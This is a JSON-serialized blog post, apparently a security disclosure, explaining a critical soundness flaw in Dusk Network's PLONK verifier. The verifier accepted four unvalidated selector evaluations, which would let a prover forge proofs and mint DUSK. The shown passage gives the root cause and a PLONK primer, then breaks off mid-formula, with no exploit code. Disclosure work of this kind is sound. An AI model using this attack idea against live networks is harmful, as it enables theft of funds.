[{"data":1,"prerenderedAt":149341},["ShallowReactive",2],{"blog-/blog/2026-04-30-unverified-evaluations-dusk-plonk":3,"featured-blog-posts":5439},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":11,"image":14,"isFeatured":18,"onBlogPage":18,"tags":19,"body":22,"_type":5433,"_id":5434,"_source":5435,"_file":5436,"_stem":5437,"_extension":5438},"/blog/2026-04-30-unverified-evaluations-dusk-plonk","blog",false,"","Unverified Evaluations in Dusk's PLONK","Dusk's privacy layer protects ~$60M of DUSK and hinges on one proof check. dusk-plonk's verifier never validated four of the prover's polynomial commitments, enough to mint DUSK from nothing and forge shielded spends the network confirmed as real.","2026-04-30T12:00:00.000Z",[12,13],"himanshu","valter",{"src":15,"width":16,"height":17},"/posts/dusk-commitment-issues/title.png",1536,1024,true,[20,21],"dusk","plonk",{"type":23,"children":24,"toc":5411},"root",[25,34,78,91,98,112,117,124,471,475,756,994,1000,1699,1703,2206,2215,2221,2240,2245,2251,2478,2517,2529,2535,2546,3259,3264,3268,3274,3328,3364,3396,3401,3405,3408,3414,3425,3440,3471,3539,3547,3569,3583,4025,4048,4053,4056,4062,4089,4185,4197,4244,4282,4293,4634,4651,4659,4662,4668,4673,4707,4715,4796,4799,4805,4819,4838,4843,4883,4891,4912,4915,4921,4926,4991,5005,5008,5014,5055,5066,5071,5076,5082,5096,5178,5199,5226,5229,5235,5249,5254,5259,5265,5400,5406],{"type":26,"tag":27,"props":28,"children":30},"element","h1",{"id":29},"commitment-issues-unverified-evaluations-in-dusks-plonk",[31],{"type":32,"value":33},"text","Commitment Issues: Unverified Evaluations in Dusk's PLONK",{"type":26,"tag":35,"props":36,"children":37},"p",{},[38,40,49,51,58,60,67,69,76],{"type":32,"value":39},"We found a critical soundness vulnerability in ",{"type":26,"tag":41,"props":42,"children":46},"a",{"href":43,"rel":44},"https://github.com/dusk-network/plonk/",[45],"nofollow",[47],{"type":32,"value":48},"dusk-plonk",{"type":32,"value":50},", the PLONK implementation powering ",{"type":26,"tag":41,"props":52,"children":55},{"href":53,"rel":54},"https://dusk.network/",[45],[56],{"type":32,"value":57},"Dusk Network's",{"type":32,"value":59}," ~$60M ",{"type":26,"tag":41,"props":61,"children":64},{"href":62,"rel":63},"https://www.coingecko.com/en/coins/dusk",[45],[65],{"type":32,"value":66},"market cap",{"type":32,"value":68},". By exploiting a gap in the verification step, a malicious prover could forge verifying proofs for arbitrary false statements, bypassing every constraint in the transaction circuit. On the live ",{"type":26,"tag":41,"props":70,"children":73},{"href":71,"rel":72},"https://github.com/dusk-network/rusk",[45],[74],{"type":32,"value":75},"Rusk",{"type":32,"value":77}," network, this would have enabled minting arbitrary amounts of DUSK and moving forged shielded funds through the normal Phoenix path.",{"type":26,"tag":35,"props":79,"children":80},{},[81,83,89],{"type":32,"value":82},"The root cause was that the prover slipped four public selector evaluations into the proof struct, and the verifier consumed them in its final equation ",{"type":26,"tag":84,"props":85,"children":86},"strong",{},[87],{"type":32,"value":88},"without ever validating them against the trusted commitments in the verifier key.",{"type":32,"value":90}," The prover can set them to whatever values make the equation pass.",{"type":26,"tag":92,"props":93,"children":95},"h2",{"id":94},"how-plonk-works-briefly",[96],{"type":32,"value":97},"How PLONK works (briefly)",{"type":26,"tag":35,"props":99,"children":100},{},[101,103,110],{"type":32,"value":102},"For a rigorous treatment see the ",{"type":26,"tag":41,"props":104,"children":107},{"href":105,"rel":106},"https://eprint.iacr.org/2019/953",[45],[108],{"type":32,"value":109},"original paper",{"type":32,"value":111},"; what follows covers only the parts needed to understand the bug.",{"type":26,"tag":35,"props":113,"children":114},{},[115],{"type":32,"value":116},"A prover wants to convince a verifier that it knows secret inputs satisfying some computation (an arithmetic circuit) without revealing those inputs, and the resulting proof should be short and quick to verify.",{"type":26,"tag":118,"props":119,"children":121},"h3",{"id":120},"arithmetic-circuits-and-constraints",[122],{"type":32,"value":123},"Arithmetic circuits and constraints",{"type":26,"tag":35,"props":125,"children":126},{},[127,129,201,203,376,378,469],{"type":32,"value":128},"An arithmetic circuit is a series of addition and multiplication gates wired together. An example would be proving that we know of some point ",{"type":26,"tag":130,"props":131,"children":135},"code",{"className":132},[133,134],"language-math","math-inline",[136],{"type":26,"tag":137,"props":138,"children":141},"span",{"className":139},[140],"katex",[142],{"type":26,"tag":137,"props":143,"children":147},{"className":144,"ariaHidden":146},[145],"katex-html","true",[148],{"type":26,"tag":137,"props":149,"children":152},{"className":150},[151],"base",[153,159,166,174,181,187,194],{"type":26,"tag":137,"props":154,"children":158},{"className":155,"style":157},[156],"strut","height:1em;vertical-align:-0.25em;",[],{"type":26,"tag":137,"props":160,"children":163},{"className":161},[162],"mopen",[164],{"type":32,"value":165},"(",{"type":26,"tag":137,"props":167,"children":171},{"className":168},[169,170],"mord","mathnormal",[172],{"type":32,"value":173},"x",{"type":26,"tag":137,"props":175,"children":178},{"className":176},[177],"mpunct",[179],{"type":32,"value":180},",",{"type":26,"tag":137,"props":182,"children":186},{"className":183,"style":185},[184],"mspace","margin-right:0.1667em;",[],{"type":26,"tag":137,"props":188,"children":191},{"className":189,"style":190},[169,170],"margin-right:0.03588em;",[192],{"type":32,"value":193},"y",{"type":26,"tag":137,"props":195,"children":198},{"className":196},[197],"mclose",[199],{"type":32,"value":200},")",{"type":32,"value":202}," on an elliptic curve, by e.g proving that ",{"type":26,"tag":130,"props":204,"children":206},{"className":205},[133,134],[207],{"type":26,"tag":137,"props":208,"children":210},{"className":209},[140],[211],{"type":26,"tag":137,"props":212,"children":214},{"className":213,"ariaHidden":146},[145],[215,294,361],{"type":26,"tag":137,"props":216,"children":218},{"className":217},[151],[219,224,278,283,290],{"type":26,"tag":137,"props":220,"children":223},{"className":221,"style":222},[156],"height:1.0085em;vertical-align:-0.1944em;",[],{"type":26,"tag":137,"props":225,"children":227},{"className":226},[169],[228,233],{"type":26,"tag":137,"props":229,"children":231},{"className":230,"style":190},[169,170],[232],{"type":32,"value":193},{"type":26,"tag":137,"props":234,"children":237},{"className":235},[236],"msupsub",[238],{"type":26,"tag":137,"props":239,"children":242},{"className":240},[241],"vlist-t",[243],{"type":26,"tag":137,"props":244,"children":247},{"className":245},[246],"vlist-r",[248],{"type":26,"tag":137,"props":249,"children":253},{"className":250,"style":252},[251],"vlist","height:0.8141em;",[254],{"type":26,"tag":137,"props":255,"children":257},{"style":256},"top:-3.063em;margin-right:0.05em;",[258,264],{"type":26,"tag":137,"props":259,"children":263},{"className":260,"style":262},[261],"pstrut","height:2.7em;",[],{"type":26,"tag":137,"props":265,"children":271},{"className":266},[267,268,269,270],"sizing","reset-size6","size3","mtight",[272],{"type":26,"tag":137,"props":273,"children":275},{"className":274},[169,270],[276],{"type":32,"value":277},"2",{"type":26,"tag":137,"props":279,"children":282},{"className":280,"style":281},[184],"margin-right:0.2778em;",[],{"type":26,"tag":137,"props":284,"children":287},{"className":285},[286],"mrel",[288],{"type":32,"value":289},"=",{"type":26,"tag":137,"props":291,"children":293},{"className":292,"style":281},[184],[],{"type":26,"tag":137,"props":295,"children":297},{"className":296},[151],[298,303,345,350,357],{"type":26,"tag":137,"props":299,"children":302},{"className":300,"style":301},[156],"height:0.8974em;vertical-align:-0.0833em;",[],{"type":26,"tag":137,"props":304,"children":306},{"className":305},[169],[307,312],{"type":26,"tag":137,"props":308,"children":310},{"className":309},[169,170],[311],{"type":32,"value":173},{"type":26,"tag":137,"props":313,"children":315},{"className":314},[236],[316],{"type":26,"tag":137,"props":317,"children":319},{"className":318},[241],[320],{"type":26,"tag":137,"props":321,"children":323},{"className":322},[246],[324],{"type":26,"tag":137,"props":325,"children":327},{"className":326,"style":252},[251],[328],{"type":26,"tag":137,"props":329,"children":330},{"style":256},[331,335],{"type":26,"tag":137,"props":332,"children":334},{"className":333,"style":262},[261],[],{"type":26,"tag":137,"props":336,"children":338},{"className":337},[267,268,269,270],[339],{"type":26,"tag":137,"props":340,"children":342},{"className":341},[169,270],[343],{"type":32,"value":344},"3",{"type":26,"tag":137,"props":346,"children":349},{"className":347,"style":348},[184],"margin-right:0.2222em;",[],{"type":26,"tag":137,"props":351,"children":354},{"className":352},[353],"mbin",[355],{"type":32,"value":356},"+",{"type":26,"tag":137,"props":358,"children":360},{"className":359,"style":348},[184],[],{"type":26,"tag":137,"props":362,"children":364},{"className":363},[151],[365,370],{"type":26,"tag":137,"props":366,"children":369},{"className":367,"style":368},[156],"height:0.6444em;",[],{"type":26,"tag":137,"props":371,"children":373},{"className":372},[169],[374],{"type":32,"value":375},"7",{"type":32,"value":377},", here in ",{"type":26,"tag":130,"props":379,"children":381},{"className":380},[133,134],[382],{"type":26,"tag":137,"props":383,"children":385},{"className":384},[140],[386],{"type":26,"tag":137,"props":387,"children":389},{"className":388,"ariaHidden":146},[145],[390],{"type":26,"tag":137,"props":391,"children":393},{"className":392},[151],[394,399],{"type":26,"tag":137,"props":395,"children":398},{"className":396,"style":397},[156],"height:0.8389em;vertical-align:-0.15em;",[],{"type":26,"tag":137,"props":400,"children":402},{"className":401},[169],[403,410],{"type":26,"tag":137,"props":404,"children":407},{"className":405},[169,406],"mathbb",[408],{"type":32,"value":409},"F",{"type":26,"tag":137,"props":411,"children":413},{"className":412},[236],[414],{"type":26,"tag":137,"props":415,"children":418},{"className":416},[241,417],"vlist-t2",[419,457],{"type":26,"tag":137,"props":420,"children":422},{"className":421},[246],[423,450],{"type":26,"tag":137,"props":424,"children":427},{"className":425,"style":426},[251],"height:0.3011em;",[428],{"type":26,"tag":137,"props":429,"children":431},{"style":430},"top:-2.55em;margin-left:0em;margin-right:0.05em;",[432,436],{"type":26,"tag":137,"props":433,"children":435},{"className":434,"style":262},[261],[],{"type":26,"tag":137,"props":437,"children":439},{"className":438},[267,268,269,270],[440],{"type":26,"tag":137,"props":441,"children":443},{"className":442},[169,270],[444],{"type":26,"tag":137,"props":445,"children":447},{"className":446},[169,270],[448],{"type":32,"value":449},"37",{"type":26,"tag":137,"props":451,"children":454},{"className":452},[453],"vlist-s",[455],{"type":32,"value":456},"​",{"type":26,"tag":137,"props":458,"children":460},{"className":459},[246],[461],{"type":26,"tag":137,"props":462,"children":465},{"className":463,"style":464},[251],"height:0.15em;",[466],{"type":26,"tag":137,"props":467,"children":468},{},[],{"type":32,"value":470},".",{"type":26,"tag":472,"props":473,"children":474},"arithmetic-circuit-widget",{},[],{"type":26,"tag":35,"props":476,"children":477},{},[478,480,507,509,591,593,674,676,754],{"type":32,"value":479},"Each gate ",{"type":26,"tag":130,"props":481,"children":483},{"className":482},[133,134],[484],{"type":26,"tag":137,"props":485,"children":487},{"className":486},[140],[488],{"type":26,"tag":137,"props":489,"children":491},{"className":490,"ariaHidden":146},[145],[492],{"type":26,"tag":137,"props":493,"children":495},{"className":494},[151],[496,501],{"type":26,"tag":137,"props":497,"children":500},{"className":498,"style":499},[156],"height:0.6595em;",[],{"type":26,"tag":137,"props":502,"children":504},{"className":503},[169,170],[505],{"type":32,"value":506},"i",{"type":32,"value":508}," has a left input ",{"type":26,"tag":130,"props":510,"children":512},{"className":511},[133,134],[513],{"type":26,"tag":137,"props":514,"children":516},{"className":515},[140],[517],{"type":26,"tag":137,"props":518,"children":520},{"className":519,"ariaHidden":146},[145],[521],{"type":26,"tag":137,"props":522,"children":524},{"className":523},[151],[525,530],{"type":26,"tag":137,"props":526,"children":529},{"className":527,"style":528},[156],"height:0.8444em;vertical-align:-0.15em;",[],{"type":26,"tag":137,"props":531,"children":533},{"className":532},[169],[534,541],{"type":26,"tag":137,"props":535,"children":538},{"className":536,"style":537},[169,170],"margin-right:0.01968em;",[539],{"type":32,"value":540},"l",{"type":26,"tag":137,"props":542,"children":544},{"className":543},[236],[545],{"type":26,"tag":137,"props":546,"children":548},{"className":547},[241,417],[549,580],{"type":26,"tag":137,"props":550,"children":552},{"className":551},[246],[553,575],{"type":26,"tag":137,"props":554,"children":557},{"className":555,"style":556},[251],"height:0.3117em;",[558],{"type":26,"tag":137,"props":559,"children":561},{"style":560},"top:-2.55em;margin-left:-0.0197em;margin-right:0.05em;",[562,566],{"type":26,"tag":137,"props":563,"children":565},{"className":564,"style":262},[261],[],{"type":26,"tag":137,"props":567,"children":569},{"className":568},[267,268,269,270],[570],{"type":26,"tag":137,"props":571,"children":573},{"className":572},[169,170,270],[574],{"type":32,"value":506},{"type":26,"tag":137,"props":576,"children":578},{"className":577},[453],[579],{"type":32,"value":456},{"type":26,"tag":137,"props":581,"children":583},{"className":582},[246],[584],{"type":26,"tag":137,"props":585,"children":587},{"className":586,"style":464},[251],[588],{"type":26,"tag":137,"props":589,"children":590},{},[],{"type":32,"value":592},", right input ",{"type":26,"tag":130,"props":594,"children":596},{"className":595},[133,134],[597],{"type":26,"tag":137,"props":598,"children":600},{"className":599},[140],[601],{"type":26,"tag":137,"props":602,"children":604},{"className":603,"ariaHidden":146},[145],[605],{"type":26,"tag":137,"props":606,"children":608},{"className":607},[151],[609,614],{"type":26,"tag":137,"props":610,"children":613},{"className":611,"style":612},[156],"height:0.5806em;vertical-align:-0.15em;",[],{"type":26,"tag":137,"props":615,"children":617},{"className":616},[169],[618,625],{"type":26,"tag":137,"props":619,"children":622},{"className":620,"style":621},[169,170],"margin-right:0.02778em;",[623],{"type":32,"value":624},"r",{"type":26,"tag":137,"props":626,"children":628},{"className":627},[236],[629],{"type":26,"tag":137,"props":630,"children":632},{"className":631},[241,417],[633,663],{"type":26,"tag":137,"props":634,"children":636},{"className":635},[246],[637,658],{"type":26,"tag":137,"props":638,"children":640},{"className":639,"style":556},[251],[641],{"type":26,"tag":137,"props":642,"children":644},{"style":643},"top:-2.55em;margin-left:-0.0278em;margin-right:0.05em;",[645,649],{"type":26,"tag":137,"props":646,"children":648},{"className":647,"style":262},[261],[],{"type":26,"tag":137,"props":650,"children":652},{"className":651},[267,268,269,270],[653],{"type":26,"tag":137,"props":654,"children":656},{"className":655},[169,170,270],[657],{"type":32,"value":506},{"type":26,"tag":137,"props":659,"children":661},{"className":660},[453],[662],{"type":32,"value":456},{"type":26,"tag":137,"props":664,"children":666},{"className":665},[246],[667],{"type":26,"tag":137,"props":668,"children":670},{"className":669,"style":464},[251],[671],{"type":26,"tag":137,"props":672,"children":673},{},[],{"type":32,"value":675},", and output ",{"type":26,"tag":130,"props":677,"children":679},{"className":678},[133,134],[680],{"type":26,"tag":137,"props":681,"children":683},{"className":682},[140],[684],{"type":26,"tag":137,"props":685,"children":687},{"className":686,"ariaHidden":146},[145],[688],{"type":26,"tag":137,"props":689,"children":691},{"className":690},[151],[692,696],{"type":26,"tag":137,"props":693,"children":695},{"className":694,"style":612},[156],[],{"type":26,"tag":137,"props":697,"children":699},{"className":698},[169],[700,706],{"type":26,"tag":137,"props":701,"children":703},{"className":702},[169,170],[704],{"type":32,"value":705},"o",{"type":26,"tag":137,"props":707,"children":709},{"className":708},[236],[710],{"type":26,"tag":137,"props":711,"children":713},{"className":712},[241,417],[714,743],{"type":26,"tag":137,"props":715,"children":717},{"className":716},[246],[718,738],{"type":26,"tag":137,"props":719,"children":721},{"className":720,"style":556},[251],[722],{"type":26,"tag":137,"props":723,"children":724},{"style":430},[725,729],{"type":26,"tag":137,"props":726,"children":728},{"className":727,"style":262},[261],[],{"type":26,"tag":137,"props":730,"children":732},{"className":731},[267,268,269,270],[733],{"type":26,"tag":137,"props":734,"children":736},{"className":735},[169,170,270],[737],{"type":32,"value":506},{"type":26,"tag":137,"props":739,"children":741},{"className":740},[453],[742],{"type":32,"value":456},{"type":26,"tag":137,"props":744,"children":746},{"className":745},[246],[747],{"type":26,"tag":137,"props":748,"children":750},{"className":749,"style":464},[251],[751],{"type":26,"tag":137,"props":752,"children":753},{},[],{"type":32,"value":755},". The prover's job is to show it knows wire values that satisfy every gate.",{"type":26,"tag":35,"props":757,"children":758},{},[759,761,767,769,879,881,985,987,992],{"type":32,"value":760},"Each gate imposes a constraint, and PLONK unifies all gate types into one expression using ",{"type":26,"tag":762,"props":763,"children":764},"em",{},[765],{"type":32,"value":766},"selector",{"type":32,"value":768}," values that act as switches: setting ",{"type":26,"tag":130,"props":770,"children":772},{"className":771},[133,134],[773],{"type":26,"tag":137,"props":774,"children":776},{"className":775},[140],[777],{"type":26,"tag":137,"props":778,"children":780},{"className":779,"ariaHidden":146},[145],[781,865],{"type":26,"tag":137,"props":782,"children":784},{"className":783},[151],[785,790,852,856,861],{"type":26,"tag":137,"props":786,"children":789},{"className":787,"style":788},[156],"height:0.625em;vertical-align:-0.1944em;",[],{"type":26,"tag":137,"props":791,"children":793},{"className":792},[169],[794,800],{"type":26,"tag":137,"props":795,"children":797},{"className":796,"style":190},[169,170],[798],{"type":32,"value":799},"q",{"type":26,"tag":137,"props":801,"children":803},{"className":802},[236],[804],{"type":26,"tag":137,"props":805,"children":807},{"className":806},[241,417],[808,841],{"type":26,"tag":137,"props":809,"children":811},{"className":810},[246],[812,836],{"type":26,"tag":137,"props":813,"children":816},{"className":814,"style":815},[251],"height:0.3283em;",[817],{"type":26,"tag":137,"props":818,"children":820},{"style":819},"top:-2.55em;margin-left:-0.0359em;margin-right:0.05em;",[821,825],{"type":26,"tag":137,"props":822,"children":824},{"className":823,"style":262},[261],[],{"type":26,"tag":137,"props":826,"children":828},{"className":827},[267,268,269,270],[829],{"type":26,"tag":137,"props":830,"children":833},{"className":831,"style":832},[169,170,270],"margin-right:0.10903em;",[834],{"type":32,"value":835},"M",{"type":26,"tag":137,"props":837,"children":839},{"className":838},[453],[840],{"type":32,"value":456},{"type":26,"tag":137,"props":842,"children":844},{"className":843},[246],[845],{"type":26,"tag":137,"props":846,"children":848},{"className":847,"style":464},[251],[849],{"type":26,"tag":137,"props":850,"children":851},{},[],{"type":26,"tag":137,"props":853,"children":855},{"className":854,"style":281},[184],[],{"type":26,"tag":137,"props":857,"children":859},{"className":858},[286],[860],{"type":32,"value":289},{"type":26,"tag":137,"props":862,"children":864},{"className":863,"style":281},[184],[],{"type":26,"tag":137,"props":866,"children":868},{"className":867},[151],[869,873],{"type":26,"tag":137,"props":870,"children":872},{"className":871,"style":368},[156],[],{"type":26,"tag":137,"props":874,"children":876},{"className":875},[169],[877],{"type":32,"value":878},"1",{"type":32,"value":880}," makes a row a multiplication gate, setting ",{"type":26,"tag":130,"props":882,"children":884},{"className":883},[133,134],[885],{"type":26,"tag":137,"props":886,"children":888},{"className":887},[140],[889],{"type":26,"tag":137,"props":890,"children":892},{"className":891,"ariaHidden":146},[145],[893,972],{"type":26,"tag":137,"props":894,"children":896},{"className":895},[151],[897,901,959,963,968],{"type":26,"tag":137,"props":898,"children":900},{"className":899,"style":788},[156],[],{"type":26,"tag":137,"props":902,"children":904},{"className":903},[169],[905,910],{"type":26,"tag":137,"props":906,"children":908},{"className":907,"style":190},[169,170],[909],{"type":32,"value":799},{"type":26,"tag":137,"props":911,"children":913},{"className":912},[236],[914],{"type":26,"tag":137,"props":915,"children":917},{"className":916},[241,417],[918,948],{"type":26,"tag":137,"props":919,"children":921},{"className":920},[246],[922,943],{"type":26,"tag":137,"props":923,"children":925},{"className":924,"style":815},[251],[926],{"type":26,"tag":137,"props":927,"children":928},{"style":819},[929,933],{"type":26,"tag":137,"props":930,"children":932},{"className":931,"style":262},[261],[],{"type":26,"tag":137,"props":934,"children":936},{"className":935},[267,268,269,270],[937],{"type":26,"tag":137,"props":938,"children":940},{"className":939},[169,170,270],[941],{"type":32,"value":942},"L",{"type":26,"tag":137,"props":944,"children":946},{"className":945},[453],[947],{"type":32,"value":456},{"type":26,"tag":137,"props":949,"children":951},{"className":950},[246],[952],{"type":26,"tag":137,"props":953,"children":955},{"className":954,"style":464},[251],[956],{"type":26,"tag":137,"props":957,"children":958},{},[],{"type":26,"tag":137,"props":960,"children":962},{"className":961,"style":281},[184],[],{"type":26,"tag":137,"props":964,"children":966},{"className":965},[286],[967],{"type":32,"value":289},{"type":26,"tag":137,"props":969,"children":971},{"className":970,"style":281},[184],[],{"type":26,"tag":137,"props":973,"children":975},{"className":974},[151],[976,980],{"type":26,"tag":137,"props":977,"children":979},{"className":978,"style":368},[156],[],{"type":26,"tag":137,"props":981,"children":983},{"className":982},[169],[984],{"type":32,"value":878},{"type":32,"value":986}," makes it contribute an addition term, and so on. The selector values define the circuit's shape and are public, known to both prover and verifier, while the wire values are the prover's secret witness. This per-row check does not ensure that wires between gates are consistent (that the output of one gate equals the input of the next); PLONK uses a separate ",{"type":26,"tag":762,"props":988,"children":989},{},[990],{"type":32,"value":991},"permutation argument",{"type":32,"value":993}," for that, which we will not cover here.",{"type":26,"tag":118,"props":995,"children":997},{"id":996},"from-many-checks-to-one",[998],{"type":32,"value":999},"From many checks to one",{"type":26,"tag":35,"props":1001,"children":1002},{},[1003,1005,1010,1012,1107,1109,1203,1204,1297,1299,1304,1305,1398,1399,1491,1493,1521,1523,1550,1552,1644,1646,1671,1673,1698],{"type":32,"value":1004},"Instead of checking each gate individually, PLONK reads the execution trace column by column and uses FFT interpolation to convert each array of values to a single polynomial. The wire values become ",{"type":26,"tag":762,"props":1006,"children":1007},{},[1008],{"type":32,"value":1009},"witness polynomials",{"type":32,"value":1011}," ",{"type":26,"tag":130,"props":1013,"children":1015},{"className":1014},[133,134],[1016],{"type":26,"tag":137,"props":1017,"children":1019},{"className":1018},[140],[1020],{"type":26,"tag":137,"props":1021,"children":1023},{"className":1022,"ariaHidden":146},[145],[1024],{"type":26,"tag":137,"props":1025,"children":1027},{"className":1026},[151],[1028,1032,1092,1097,1102],{"type":26,"tag":137,"props":1029,"children":1031},{"className":1030,"style":157},[156],[],{"type":26,"tag":137,"props":1033,"children":1035},{"className":1034},[169],[1036,1043],{"type":26,"tag":137,"props":1037,"children":1040},{"className":1038,"style":1039},[169,170],"margin-right:0.10764em;",[1041],{"type":32,"value":1042},"f",{"type":26,"tag":137,"props":1044,"children":1046},{"className":1045},[236],[1047],{"type":26,"tag":137,"props":1048,"children":1050},{"className":1049},[241,417],[1051,1081],{"type":26,"tag":137,"props":1052,"children":1054},{"className":1053},[246],[1055,1076],{"type":26,"tag":137,"props":1056,"children":1058},{"className":1057,"style":815},[251],[1059],{"type":26,"tag":137,"props":1060,"children":1062},{"style":1061},"top:-2.55em;margin-left:-0.1076em;margin-right:0.05em;",[1063,1067],{"type":26,"tag":137,"props":1064,"children":1066},{"className":1065,"style":262},[261],[],{"type":26,"tag":137,"props":1068,"children":1070},{"className":1069},[267,268,269,270],[1071],{"type":26,"tag":137,"props":1072,"children":1074},{"className":1073},[169,170,270],[1075],{"type":32,"value":942},{"type":26,"tag":137,"props":1077,"children":1079},{"className":1078},[453],[1080],{"type":32,"value":456},{"type":26,"tag":137,"props":1082,"children":1084},{"className":1083},[246],[1085],{"type":26,"tag":137,"props":1086,"children":1088},{"className":1087,"style":464},[251],[1089],{"type":26,"tag":137,"props":1090,"children":1091},{},[],{"type":26,"tag":137,"props":1093,"children":1095},{"className":1094},[162],[1096],{"type":32,"value":165},{"type":26,"tag":137,"props":1098,"children":1100},{"className":1099},[169,170],[1101],{"type":32,"value":173},{"type":26,"tag":137,"props":1103,"children":1105},{"className":1104},[197],[1106],{"type":32,"value":200},{"type":32,"value":1108},", ",{"type":26,"tag":130,"props":1110,"children":1112},{"className":1111},[133,134],[1113],{"type":26,"tag":137,"props":1114,"children":1116},{"className":1115},[140],[1117],{"type":26,"tag":137,"props":1118,"children":1120},{"className":1119,"ariaHidden":146},[145],[1121],{"type":26,"tag":137,"props":1122,"children":1124},{"className":1123},[151],[1125,1129,1188,1193,1198],{"type":26,"tag":137,"props":1126,"children":1128},{"className":1127,"style":157},[156],[],{"type":26,"tag":137,"props":1130,"children":1132},{"className":1131},[169],[1133,1138],{"type":26,"tag":137,"props":1134,"children":1136},{"className":1135,"style":1039},[169,170],[1137],{"type":32,"value":1042},{"type":26,"tag":137,"props":1139,"children":1141},{"className":1140},[236],[1142],{"type":26,"tag":137,"props":1143,"children":1145},{"className":1144},[241,417],[1146,1177],{"type":26,"tag":137,"props":1147,"children":1149},{"className":1148},[246],[1150,1172],{"type":26,"tag":137,"props":1151,"children":1153},{"className":1152,"style":815},[251],[1154],{"type":26,"tag":137,"props":1155,"children":1156},{"style":1061},[1157,1161],{"type":26,"tag":137,"props":1158,"children":1160},{"className":1159,"style":262},[261],[],{"type":26,"tag":137,"props":1162,"children":1164},{"className":1163},[267,268,269,270],[1165],{"type":26,"tag":137,"props":1166,"children":1169},{"className":1167,"style":1168},[169,170,270],"margin-right:0.00773em;",[1170],{"type":32,"value":1171},"R",{"type":26,"tag":137,"props":1173,"children":1175},{"className":1174},[453],[1176],{"type":32,"value":456},{"type":26,"tag":137,"props":1178,"children":1180},{"className":1179},[246],[1181],{"type":26,"tag":137,"props":1182,"children":1184},{"className":1183,"style":464},[251],[1185],{"type":26,"tag":137,"props":1186,"children":1187},{},[],{"type":26,"tag":137,"props":1189,"children":1191},{"className":1190},[162],[1192],{"type":32,"value":165},{"type":26,"tag":137,"props":1194,"children":1196},{"className":1195},[169,170],[1197],{"type":32,"value":173},{"type":26,"tag":137,"props":1199,"children":1201},{"className":1200},[197],[1202],{"type":32,"value":200},{"type":32,"value":1108},{"type":26,"tag":130,"props":1205,"children":1207},{"className":1206},[133,134],[1208],{"type":26,"tag":137,"props":1209,"children":1211},{"className":1210},[140],[1212],{"type":26,"tag":137,"props":1213,"children":1215},{"className":1214,"ariaHidden":146},[145],[1216],{"type":26,"tag":137,"props":1217,"children":1219},{"className":1218},[151],[1220,1224,1282,1287,1292],{"type":26,"tag":137,"props":1221,"children":1223},{"className":1222,"style":157},[156],[],{"type":26,"tag":137,"props":1225,"children":1227},{"className":1226},[169],[1228,1233],{"type":26,"tag":137,"props":1229,"children":1231},{"className":1230,"style":1039},[169,170],[1232],{"type":32,"value":1042},{"type":26,"tag":137,"props":1234,"children":1236},{"className":1235},[236],[1237],{"type":26,"tag":137,"props":1238,"children":1240},{"className":1239},[241,417],[1241,1271],{"type":26,"tag":137,"props":1242,"children":1244},{"className":1243},[246],[1245,1266],{"type":26,"tag":137,"props":1246,"children":1248},{"className":1247,"style":815},[251],[1249],{"type":26,"tag":137,"props":1250,"children":1251},{"style":1061},[1252,1256],{"type":26,"tag":137,"props":1253,"children":1255},{"className":1254,"style":262},[261],[],{"type":26,"tag":137,"props":1257,"children":1259},{"className":1258},[267,268,269,270],[1260],{"type":26,"tag":137,"props":1261,"children":1263},{"className":1262,"style":621},[169,170,270],[1264],{"type":32,"value":1265},"O",{"type":26,"tag":137,"props":1267,"children":1269},{"className":1268},[453],[1270],{"type":32,"value":456},{"type":26,"tag":137,"props":1272,"children":1274},{"className":1273},[246],[1275],{"type":26,"tag":137,"props":1276,"children":1278},{"className":1277,"style":464},[251],[1279],{"type":26,"tag":137,"props":1280,"children":1281},{},[],{"type":26,"tag":137,"props":1283,"children":1285},{"className":1284},[162],[1286],{"type":32,"value":165},{"type":26,"tag":137,"props":1288,"children":1290},{"className":1289},[169,170],[1291],{"type":32,"value":173},{"type":26,"tag":137,"props":1293,"children":1295},{"className":1294},[197],[1296],{"type":32,"value":200},{"type":32,"value":1298}," and the selectors become ",{"type":26,"tag":762,"props":1300,"children":1301},{},[1302],{"type":32,"value":1303},"selector polynomials",{"type":32,"value":1011},{"type":26,"tag":130,"props":1306,"children":1308},{"className":1307},[133,134],[1309],{"type":26,"tag":137,"props":1310,"children":1312},{"className":1311},[140],[1313],{"type":26,"tag":137,"props":1314,"children":1316},{"className":1315,"ariaHidden":146},[145],[1317],{"type":26,"tag":137,"props":1318,"children":1320},{"className":1319},[151],[1321,1325,1383,1388,1393],{"type":26,"tag":137,"props":1322,"children":1324},{"className":1323,"style":157},[156],[],{"type":26,"tag":137,"props":1326,"children":1328},{"className":1327},[169],[1329,1335],{"type":26,"tag":137,"props":1330,"children":1332},{"className":1331},[169,170],[1333],{"type":32,"value":1334},"Q",{"type":26,"tag":137,"props":1336,"children":1338},{"className":1337},[236],[1339],{"type":26,"tag":137,"props":1340,"children":1342},{"className":1341},[241,417],[1343,1372],{"type":26,"tag":137,"props":1344,"children":1346},{"className":1345},[246],[1347,1367],{"type":26,"tag":137,"props":1348,"children":1350},{"className":1349,"style":815},[251],[1351],{"type":26,"tag":137,"props":1352,"children":1353},{"style":430},[1354,1358],{"type":26,"tag":137,"props":1355,"children":1357},{"className":1356,"style":262},[261],[],{"type":26,"tag":137,"props":1359,"children":1361},{"className":1360},[267,268,269,270],[1362],{"type":26,"tag":137,"props":1363,"children":1365},{"className":1364,"style":832},[169,170,270],[1366],{"type":32,"value":835},{"type":26,"tag":137,"props":1368,"children":1370},{"className":1369},[453],[1371],{"type":32,"value":456},{"type":26,"tag":137,"props":1373,"children":1375},{"className":1374},[246],[1376],{"type":26,"tag":137,"props":1377,"children":1379},{"className":1378,"style":464},[251],[1380],{"type":26,"tag":137,"props":1381,"children":1382},{},[],{"type":26,"tag":137,"props":1384,"children":1386},{"className":1385},[162],[1387],{"type":32,"value":165},{"type":26,"tag":137,"props":1389,"children":1391},{"className":1390},[169,170],[1392],{"type":32,"value":173},{"type":26,"tag":137,"props":1394,"children":1396},{"className":1395},[197],[1397],{"type":32,"value":200},{"type":32,"value":1108},{"type":26,"tag":130,"props":1400,"children":1402},{"className":1401},[133,134],[1403],{"type":26,"tag":137,"props":1404,"children":1406},{"className":1405},[140],[1407],{"type":26,"tag":137,"props":1408,"children":1410},{"className":1409,"ariaHidden":146},[145],[1411],{"type":26,"tag":137,"props":1412,"children":1414},{"className":1413},[151],[1415,1419,1476,1481,1486],{"type":26,"tag":137,"props":1416,"children":1418},{"className":1417,"style":157},[156],[],{"type":26,"tag":137,"props":1420,"children":1422},{"className":1421},[169],[1423,1428],{"typ